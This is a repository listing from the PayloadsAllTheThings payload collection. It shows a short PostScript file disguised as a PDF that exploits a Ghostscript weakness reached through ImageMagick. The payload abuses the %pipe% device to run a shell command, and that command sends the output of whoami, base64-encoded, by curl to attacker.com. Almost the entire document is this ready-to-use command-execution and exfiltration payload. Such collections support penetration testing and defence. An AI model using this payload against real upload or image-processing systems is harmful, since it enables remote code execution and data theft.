PayloadsAllTheThings/Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd_exec.pdf
2023-03-19 22:46:56 +01:00

4 lines
No EOL
130 B
Text

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit